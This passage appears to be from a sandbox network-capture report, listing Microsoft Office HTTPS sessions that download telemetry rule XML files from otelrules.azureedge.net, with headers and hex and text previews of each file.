                                                                                        2024-11-30 11:48:56 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        129192.168.2.44987813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:55 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:56 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:56 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1388
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                        ETag: "0x8DC582BDBD9126E"
                                                                                        x-ms-request-id: fc0d267c-101e-0079-0929-415913000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114856Z-174f7845968xr5c2hC1EWRd0hn0000000k50000000008fsu
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:56 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        130192.168.2.44988113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:55 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:56 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:56 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1405
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                        ETag: "0x8DC582BE89A8F82"
                                                                                        x-ms-request-id: 562f2249-001e-0028-5dab-42c49f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114856Z-174f7845968frfdmhC1EWRxxbw00000011e0000000004zsw
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:56 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        131192.168.2.44988013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:55 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:56 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:56 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1378
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                        ETag: "0x8DC582BDB813B3F"
                                                                                        x-ms-request-id: 5818dd1d-501e-0035-4638-40c923000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114856Z-174f7845968jrjrxhC1EWRmmrs00000011h0000000004xr0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:56 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        132192.168.2.44988213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:57 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:58 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:57 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1368
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                        ETag: "0x8DC582BE51CE7B3"
                                                                                        x-ms-request-id: 21a32f9a-a01e-003d-21b4-4298d7000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114857Z-174f7845968swgbqhC1EWRmnb400000011mg000000002e6c
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:58 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        133192.168.2.44988413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:57 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:58 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1378
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                        ETag: "0x8DC582BE584C214"
                                                                                        x-ms-request-id: dbe9ef63-901e-005b-3a83-3f2005000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114858Z-174f7845968nxc96hC1EWRspw8000000117g000000000zf8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:58 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        134192.168.2.44988313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:57 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:58 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1415
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                        ETag: "0x8DC582BDCE9703A"
                                                                                        x-ms-request-id: 67f9b02f-701e-0053-4491-3f3a0a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114858Z-174f7845968kdththC1EWRzvxn0000000dqg000000006dq2
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:58 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        135192.168.2.44988513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:58 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:58 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1370
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                        ETag: "0x8DC582BDE62E0AB"
                                                                                        x-ms-request-id: c2b29ccb-201e-0000-0bb4-42a537000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114858Z-174f7845968pf68xhC1EWRr4h800000011n0000000005fd5
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:58 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        136192.168.2.44988613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:58 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:58 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1407
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                        ETag: "0x8DC582BE687B46A"
                                                                                        x-ms-request-id: c1f28834-d01e-0017-0cd3-41b035000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114858Z-174f7845968px8v7hC1EWR08ng00000011mg0000000076p6
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:58 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        137192.168.2.44988713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:59 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:49:00 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:49:00 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1397
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                        ETag: "0x8DC582BE156D2EE"
                                                                                        x-ms-request-id: 581112ab-301e-0000-7391-3feecc000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114900Z-174f78459688l8rvhC1EWRtzr00000000e30000000000825
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:49:00 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        138192.168.2.44988913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:49:00 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:49:00 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:49:00 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1360
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                        ETag: "0x8DC582BEDC8193E"
                                                                                        x-ms-request-id: fa9326b6-d01e-0066-63b5-42ea17000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114900Z-174f784596886s2bhC1EWR743w00000011h0000000000r74
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:49:00 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        139192.168.2.44988813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:49:00 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
